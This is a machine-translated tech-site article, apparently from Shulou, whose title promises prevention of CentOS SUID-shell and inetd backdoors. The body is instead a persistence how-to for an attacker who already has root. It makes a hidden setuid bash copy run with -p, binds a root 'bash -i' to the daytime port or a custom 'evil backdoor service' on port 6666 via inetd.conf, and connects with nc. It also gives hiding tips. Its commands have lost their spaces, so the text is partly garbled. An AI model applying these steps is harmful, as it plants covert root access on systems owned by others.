Shulou(Shulou.com)06/01 Report--

This article focuses on "how to prevent CentOS from being used by suid shell and inetd backdoors". Interested friends may wish to have a look. The method introduced in this paper is simple, fast and practical. Let's let the editor take you to learn "how to prevent CentOS from being used by suid shell and inetd backdoors".

You are now a root user and want to leave a back door.

System environment:

Dawg:~#uname-a

Linuxdawg2.4.20-1-386#3SatMar2212:11:40EST2003i686GNU/Linux

1.SUIDshell

First, switch to the root user and execute the following command:

Dawg:~#cp/bin/bash/.wootdawg:~#chmod4755/.wootdawg:~#ls-al/.woot-rwsr-xr-x1rootroot690668Jul2417:14/.woot

Of course, you can also come up with other names that are more hidden. I think you, who are obscene and witty, will come up with a lot of good names. The one in front of the file is not necessary, just to hide the file (you can hide it in any file directory by adding "." at the beginning of the file name).

Now, as a regular user, let's enable this backdoor:

Fw@dawg:~$iduid=1000 (fw) gid=1000 (fw) groups=1000 (fw) fw@dawg:~$/.woot.woot-2.05b$iduid=1000 (fw) gid=1000 (fw) groups=1000 (fw). Woot-2.05b$

Why not?

Because bash3 has some security measures against suid. But it's not unbreakable:

.woot-2.05b$/.woot-p

. woot-2.05b#id

Uid=1000 (fw) gid=1000 (fw) euid=0 (root) groups=1000 (fw)

Use the-p parameter to get a rootshell. This euid means effectiveuserid (knowledge of these ID can be stamped here)

It is important to note here that when executing this SUIDshell as an ordinary user, be sure to use the full path.

A little knowledge:

How to find files with SUID:

Dawg:~#find/-perm+4000-ls

The file with the SUID bit is returned.

two。 Remote backdoor: take advantage of / etc/inetd.conf

We use vi to modify the / etc/inetd.conf file

Original file:

# chargendgramudpwaitrootinternal

# discardstreamtcpnowaitrootinternal

# discarddgramudpwaitrootinternal

# daytimestreamtcpnowaitrootinternal

Modified to:

# discardstreamtcpnowaitrootinternal

# discarddgramudpwaitrootinternal

Daytimestreamtcpnowaitroot/bin/bashbash-i

Enable inetd:

Dawg:~#inetd

To force a restart of inetd:

Dawg:~#ps-ef | grepinetdroot36210Jul22?00:00:00/usr/sbin/inetdroot1376913643017:51pts/100:00:00grepinetddawg:~#kill-HUP362

Now we can use nc to kick ass:

C:tools192.168.1.77:inversehostlookupfailed:h_errno11004:NO_DATA

(UNKNOWN) [192.168.1.77] 13 (daytime) open

Bash:nojobcontrolinthisshell

Bash-2.05b#bash-2.05b#

Bash-2.05b#iduid=0 (root)

Gid=0 (root) groups=0 (root) bash-2.05b#uname-a

Linuxdawg2.4.20-1-386#3SatMar2212:11:40EST2003i686GNU/Linux

Tips:

We can modify the / etc/services file to add the following:

Woot6666/tcp#evilbackdoorservice

Then modify / etc/inetd.conf:

Wootstreamtcpnowaitroot/bin/bashbash-i

We can modify it to some common ports to achieve hiding.

At this point, I believe you have a deeper understanding of "how to prevent CentOS from being used by suid shell and inetd backdoors". You might as well do it in practice. Here is the website, more related content can enter the relevant channels to inquire, follow us, continue to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.